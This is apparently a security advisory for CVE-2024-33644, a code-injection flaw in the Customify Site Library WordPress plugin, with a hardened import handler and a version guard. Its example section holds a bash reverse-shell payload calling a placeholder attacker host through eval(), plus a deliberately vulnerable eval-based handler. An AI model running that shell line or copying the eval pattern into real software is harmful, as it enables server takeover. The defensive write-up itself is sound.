A code-injection vulnerability, tracked as CVE-2024-33644, has been disclosed in WPCustomify's Customify Site Library WordPress plugin. It allows an attacker to inject code that an affected site then executes on its server. The issue affects Customify Site Library up to and including version 0.0.9; no lower bound is known, which is why the advisory lists the starting version as "n/a". Site administrators running this plugin should treat the finding as urgent and mitigate it as described below.

Original References

- CVE-2024-33644 - National Vulnerability Database (NVD)
- WPCustomify - Customify Site Library Official Page

Vulnerability Details

This vulnerability is classified as Improper Control of Generation of Code ('Code Injection'), CWE-94. The weakness is reported to lie in the plugin's site-import functionality: data supplied to the import routine is neither validated nor sanitized, so attacker-controlled input can be treated as code rather than as data and executed by the PHP interpreter with the privileges of the web server user. Whether an attacker needs an account on the site, and of what role, is not stated on this page; consult the linked advisory for the authentication requirement and the CVSS score before prioritizing.

Example Code Snippet

Assume a WordPress website is running a vulnerable version of Customify Site Library (0.0.9 or earlier). The snippet below is an illustration of the code-injection pattern, not the plugin's actual source: data from an import file is handed to a sink that executes it as PHP.

// Illustrative pattern only (not the plugin's code): untrusted import data
// reaches a code-generation sink. The sink shown here, eval(), stands in for
// whatever the real importer did with the data.

// Example malicious payload: a bash reverse shell to an attacker-controlled host
$malicious_payload = "exec('/bin/bash -c \"exec 5<>/dev/tcp/attacker_ip/attacker_port;cat <&5 | while read line; do \$line 2>&5 >&5; done\"');";

// Assume $import_data holds the imported site data, taken from the request without validation
$import_data = array( 'site_data' => $malicious_payload );

// The injection point: the import field is executed as PHP instead of being stored as data (CWE-94)
eval( $import_data['site_data'] );

When import data like this reaches such a sink, the result is remote code execution (RCE) on the targeted site. The attacker's code runs as the web server user, which on a typical shared or single-site host means full read and write access to the WordPress files, the wp-config.php database credentials, and the database itself. Consequences include theft of stored data, defacement or disruption of the site, persistence through planted backdoors or rogue administrator accounts, and use of the site to distribute malware to its visitors.
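For contrast, the following is an added example (not Customify Site Library source) of an import handler written first in the vulnerable shape described above and then in a hardened form. The function names, the 'demo_import' action, the upload field 'site' and the option keys are hypothetical; the WordPress functions called are real core APIs. The constructed attacker upload in the comment shows how the vulnerable version is abused.

```php
<?php
// Added example: not Customify Site Library source. The function names, the
// 'demo_import' action, the upload field 'site' and the option keys are
// hypothetical; the WordPress functions called are real core APIs.

// Constructed attacker upload for the vulnerable handler:
//   {"site_data": "system('id')"}
// The value is a PHP expression, and the vulnerable handler below would run it.

// VULNERABLE pattern: the import blob is trusted, and one field is evaluated as code.
function demo_import_vulnerable() {
    $blob = json_decode( file_get_contents( $_FILES['site']['tmp_name'] ), true );
    // The author expected a settings array literal here; eval() runs whatever was sent.
    $settings = eval( 'return ' . $blob['site_data'] . ';' );
    foreach ( (array) $settings as $name => $value ) {
        update_option( $name, $value );
    }
}

// HARDENED pattern: authorize first, then treat the import strictly as data.
function demo_import_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', 403 );
    }
    check_admin_referer( 'demo_import' ); // CSRF token for the hypothetical import form

    $tmp = isset( $_FILES['site']['tmp_name'] ) ? $_FILES['site']['tmp_name'] : '';
    if ( '' === $tmp || ! is_uploaded_file( $tmp ) ) {
        wp_die( 'No import file', 400 );
    }
    $blob = json_decode( file_get_contents( $tmp ), true );
    if ( ! is_array( $blob ) || ! isset( $blob['site_data'] ) || ! is_array( $blob['site_data'] ) ) {
        wp_die( 'Malformed import', 400 );
    }

    // Allowlist: the option keys this importer may write, and the sanitizer for each value.
    $allowed = array(
        'blogname'        => 'sanitize_text_field',
        'blogdescription' => 'sanitize_text_field',
        'demo_accent'     => 'sanitize_hex_color', // hypothetical theme option
    );
    foreach ( $blob['site_data'] as $name => $value ) {
        if ( ! isset( $allowed[ $name ] ) || ! is_scalar( $value ) ) {
            continue; // unknown keys and nested structures are dropped, never executed
        }
        update_option( $name, call_user_func( $allowed[ $name ], (string) $value ) );
    }
    wp_safe_redirect( admin_url( 'options-general.php?imported=1' ) );
    exit;
}

add_action( 'admin_post_demo_import', 'demo_import_hardened' );
```

The hardened handler never has a code sink at all: the import format is JSON, which decodes to plain arrays and strings, and every key is checked against an allowlist with a dedicated sanitizer before it is stored. The capability and nonce checks come first so that even a bug in the parsing cannot be reached by an unauthenticated request or a cross-site request forged against a logged-in administrator.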

Impact and Risks

Customify Site Library is distributed through the WordPress plugin directory and has been downloaded thousands of times, so a significant number of WordPress sites are potentially exposed. Because the flaw is code injection rather than, say, a stored XSS, a single successful request can compromise the whole site and any other site sharing the same hosting account.

Solutions and Recommendations

Address this vulnerability as soon as possible to avoid the consequences described above. The steps to protect a site against CVE-2024-33644 are:

1. Update Customify Site Library to a release later than 0.0.9 as soon as a fixed version is available. If no patched release exists yet, deactivate and uninstall the plugin until one is published; a deactivated plugin's import routine cannot be reached.
2. Check the site for signs of prior compromise: recently modified or unexpected PHP files under wp-content, administrator accounts you did not create, and scheduled tasks (wp-cron events) you do not recognize. Code injection leaves persistence behind, so updating alone does not evict an attacker who already got in.
3. Regularly back up the site's files and database, and keep copies off the server, so the site can be restored to a known-good state if it is compromised.
4. Use strong, unique passwords for all WordPress accounts, and enable two-factor authentication (2FA) where possible. This does not fix the plugin, but it limits what an attacker can do with credentials harvested from a compromised site.
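One way to enforce step 1 automatically across a fleet of sites is a must-use plugin that deactivates the affected versions until a fix is installed. The following is an added example, not code from WPCustomify or the WordPress project; the plugin file path 'customify-sites/customify-sites.php' is an assumption and should be confirmed against the Plugins screen or `wp plugin list` before use. The WordPress functions called are real core APIs.

```php
<?php
/**
 * Plugin Name: Guard for CVE-2024-33644 (added example)
 * Description: Deactivates Customify Site Library while the installed version is
 *              within the affected range (through 0.0.9). Drop into wp-content/mu-plugins/.
 *
 * Added example, not WPCustomify code. GUARD_PLUGIN_FILE is an assumed path.
 */

const GUARD_PLUGIN_FILE  = 'customify-sites/customify-sites.php'; // assumed plugin file path
const GUARD_LAST_BAD_VER = '0.0.9';                               // affected through this version

function guard_customify_site_library() {
    // get_plugins()/is_plugin_active()/deactivate_plugins() live in an admin include.
    if ( ! function_exists( 'get_plugins' ) ) {
        require_once ABSPATH . 'wp-admin/includes/plugin.php';
    }

    $plugins = get_plugins();
    if ( ! isset( $plugins[ GUARD_PLUGIN_FILE ] ) ) {
        return; // plugin not installed on this site
    }

    $version = $plugins[ GUARD_PLUGIN_FILE ]['Version'];

    // version_compare() handles '0.0.9' vs '0.0.10' correctly, unlike a string comparison.
    if ( version_compare( $version, GUARD_LAST_BAD_VER, '<=' ) && is_plugin_active( GUARD_PLUGIN_FILE ) ) {
        deactivate_plugins( GUARD_PLUGIN_FILE );
        error_log( sprintf( 'guard: deactivated Customify Site Library %s (CVE-2024-33644)', $version ) );

        add_action( 'admin_notices', function () use ( $version ) {
            printf(
                '<div class="notice notice-error"><p>Customify Site Library %s was deactivated because it is affected by CVE-2024-33644. Update to a fixed release before re-activating.</p></div>',
                esc_html( $version )
            );
        } );
    }
}
add_action( 'admin_init', 'guard_customify_site_library' );
```

Must-use plugins load before regular plugins and cannot be deactivated from the dashboard, which makes them a reasonable place for a temporary control like this; remove the file once every site is on a fixed release, or the guard will keep the plugin off if the vendor ever ships a version number within the range by mistake.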

Further Reading and Resources

- WordPress Security Best Practices
- Code Injection Overview - OWASP
- Guide to Understanding CVEs

Timeline

Published on: 05/17/2024 09:15:42 UTC
Last modified on: 05/17/2024 18:36:05 UTC